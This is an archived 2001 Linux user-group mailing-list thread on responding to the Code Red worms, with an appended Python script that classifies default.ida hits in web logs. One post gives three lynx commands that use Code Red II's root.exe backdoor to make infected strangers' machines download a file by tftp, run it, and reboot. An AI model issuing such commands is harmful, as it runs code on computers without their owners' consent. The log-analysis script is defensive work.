Actually, since Code Red II installs a backdoor, you could have an
autoresponder script that gets run against the IP of the machine hitting
default.ida on your webserver.

Something like (friggin Outlook capitalizes all of the following lines):
Lynx -source http://infectedhost/scripts/root.exe+/c+tftp+-i+tftpserver.yourdomain.com+GET+iispatch.exe+c:\iispatch.exe > /dev/null
Lynx -source http://infectedhost/scripts/root.exe+/c+c:\iispatch.exe > /dev/null
Lynx -source http://infectedhost/scripts/root.exe+/c+reboot

Or something similar.  You'd probably need something in there to remove the
worm also, because the patch won't remove the worm from the system.



> -----Original Message-----
> From: joel at luths.net [mailto:joel at luths.net] 
> Sent: Tuesday, August 07, 2001 1:10 PM
> To: tclug-list at mn-linux.org
> Subject: Re: [TCLUG] Code Red Auto Fix
> 
> 
> Seems like webmaster at domain is often a black hole anyway. Anyone who
> still has an unpatched IIS is unlikely to have set up a proper webmaster
> mail account.
> 
> Quoting Yaron <jethro at freakzilla.com>:
> 
> >   Hi,
> > 
> > On Tue, 7 Aug 2001, Spencer J Sinn wrote:
> > 
> > > Making changes or modifications to anyone's machine without their
> > > express consent is illegal. Setting up an auto-mailer to contact the
> > > webmaster is not a bad idea.
> > 
> > Except a lot of these are dorky kids running NT with no mail support.
> > 
> > 
> > -Yaron
> > 
>
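Added example, not part of the original thread: a log-side way to identify the hosts hitting default.ida and separate the Code Red II ones (the variant with the root.exe backdoor discussed above) so their owners can be notified. The sample log lines, addresses and function names are constructed for illustration; the N versus X padding distinction between the two worms is general knowledge, not something stated in the thread.

```python
import re
from collections import defaultdict

# Constructed sample access log (common log format, documentation-range
# addresses); the worm's long query string is truncated to its padding.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Aug/2001:13:02:11 -0500] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 404 276
198.51.100.7 - - [07/Aug/2001:13:02:40 -0500] "GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0" 404 276
192.0.2.10 - - [07/Aug/2001:13:05:19 -0500] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 404 276
203.0.113.5 - - [07/Aug/2001:13:06:02 -0500] "GET /index.html HTTP/1.0" 200 1043
203.0.113.9 - - [07/Aug/2001:13:07:45 -0500] "GET /default.ida HTTP/1.0" 404 276
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" \d{3}')
# Padding character that fills the query string in each variant's request.
PADDING = {"N": "Code Red", "X": "Code Red II"}


def classify(path):
    """Return the worm variant for a request path, or None if unrelated."""
    name, _, query = path.partition("?")
    if name.lower() != "/default.ida":
        return None
    run = re.match(r"(N{8,}|X{8,})", query)
    return PADDING[run.group(1)[0]] if run else "unclassified probe"


def find_infected(log_text):
    """Map source IP -> variants seen, hit count, first and last timestamp."""
    hosts = defaultdict(lambda: {"variants": set(), "hits": 0, "first": None, "last": None})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        ip, stamp, path = m.groups()
        variant = classify(path)
        if variant is None:
            continue
        entry = hosts[ip]
        entry["variants"].add(variant)
        entry["hits"] += 1
        entry["first"] = entry["first"] or stamp
        entry["last"] = stamp
    return dict(hosts)


def backdoored(hosts):
    """IPs whose requests match Code Red II, the variant that leaves a backdoor."""
    return sorted(ip for ip, e in hosts.items() if "Code Red II" in e["variants"])
```

Calling `backdoored(find_infected(SAMPLE_LOG))` returns the single constructed Code Red II source; the per-host hit counts and timestamps are what a notification to the owner or their ISP would quote.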